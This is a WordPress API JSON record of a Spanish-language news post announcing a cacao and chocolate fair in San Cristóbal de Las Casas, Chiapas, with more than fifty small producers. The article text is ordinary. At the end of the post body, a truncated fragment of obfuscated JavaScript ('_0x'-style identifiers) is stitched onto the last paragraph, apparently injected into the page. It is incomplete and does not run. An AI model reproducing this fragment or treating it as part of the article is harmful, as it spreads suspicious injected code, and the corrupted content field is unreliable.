{"id":17540,"date":"2024-08-29T03:02:50","date_gmt":"2024-08-29T03:02:50","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17540"},"modified":"2024-08-29T03:02:51","modified_gmt":"2024-08-29T03:02:51","slug":"habra-feria-del-cacao-y-chocolate-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17540","title":{"rendered":"Habr\u00e1 Feria del Cacao y Chocolate en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"662\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022-1024x662.jpg\" alt=\"\" class=\"wp-image-17541\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022-1024x662.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022-300x194.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022-768x497.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022-1536x994.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/IMG-20240828-WA0022.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>28 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Del 31 de agosto al 2 de septiembre, el parque central de esta ciudad ser\u00e1 la sede de m\u00e1s de cincuenta peque\u00f1os productores de cacao y chocolate de toda la regi\u00f3n de Chiapas, para que presenten sus productos al p\u00fablico.<\/p>\n\n\n\n<p>Este evento, anunciado por Rogelio Pedraza, presidente de la Academia Mexicana del Cacao y del Chocolate, busca dar a conocer la riqueza y diversidad del cacao chiapaneco, as\u00ed como apoyar a los generadores locales en la promoci\u00f3n y comercializaci\u00f3n de sus productos.<\/p>\n\n\n\n<p>&#8220;Es una oportunidad \u00fanica para que los asistentes conozcan y disfruten de la calidad excepcional del cacao y del chocolate producido en nuestra tierra&#8221;, destac\u00f3 Pedraza, quien resalt\u00f3 la importancia de este tipo de encuentros para fortalecer el reconocimiento de Chiapas como un referente en la producci\u00f3n de cacao a nivel nacional e internacional.<\/p>\n\n\n\n<p>Durante los tres d\u00edas que durar\u00e1 la feria, los visitantes podr\u00e1n degustar una amplia variedad de chocolates artesanales, adem\u00e1s de otros derivados del cacao, mientras conocen de primera mano el proceso de elaboraci\u00f3n y la historia detr\u00e1s de estos productos.<\/p>\n\n\n\n<p>&#8220;Con esta iniciativa, se espera no solo promover el consumo de cacao local, sino tambi\u00e9n concienciar sobre la importancia de mantener vivas las tradiciones y t\u00e9cnicas ancestrales que han hecho del cacao chiapaneco un producto de alta calidad y renombre&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 28 de agosto del 2024. San Crist\u00f3bal de Las Casas.- Del 31 de agosto al 2 de septiembre, el parque central de esta ciudad ser\u00e1 la sede de m\u00e1s de cincuenta peque\u00f1os productores de cacao y chocolate de toda la regi\u00f3n de Chiapas, para que presenten sus productos al p\u00fablico. Este evento, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17541,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17540","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17540"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17540\/revisions"}],"predecessor-version":[{"id":17542,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17540\/revisions\/17542"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17541"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17540"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}